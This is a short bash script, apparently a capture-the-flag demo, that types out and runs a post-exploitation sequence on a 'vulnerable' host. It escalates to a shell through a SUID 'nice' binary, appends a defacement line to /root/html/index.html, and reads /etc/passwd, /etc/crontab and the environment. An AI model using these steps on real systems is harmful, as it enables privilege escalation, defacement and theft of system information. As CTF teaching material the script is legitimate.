#!/bin/bash

echo -n "vulnerable:1> "
sleep 1
echo "id" | pv -qL 10 
id
echo -n "vulnerable:1> "
sleep 1
echo "ls -la /usr/bin/nice" | pv -qL 10 
ls -la /usr/bin/nice
echo -n "vulnerable:1> "
sleep 1
echo "./nice /bin/sh -p" | pv -qL 10 
./nice /bin/sh -p
echo -n "vulnerable:1> "
sleep 1
echo "echo \"4. I was here too ~ @0dayCTF\" >> /root/html/index.html" | pv -qL 10 
echo "4. I was here too ~ @0dayCTF" >> /root/html/index.html
echo -n "vulnerable:1> "
sleep 1
echo "find / -type f -name \"*.txt\" 2>/dev/null" | pv -qL 10 
find / -type f -name "*.txt" 2>/dev/null
echo -n "vulnerable:1> "
sleep 1
echo "cat /etc/passwd" | pv -qL 10 
cat /etc/passwd
echo -n "vulnerable:1> "
sleep 1
echo "cat /etc/crontab" | pv -qL 10 
cat /etc/crontab
echo -n "vulnerable:1> "
sleep 1
echo "env" | pv -qL 10 
env
exit
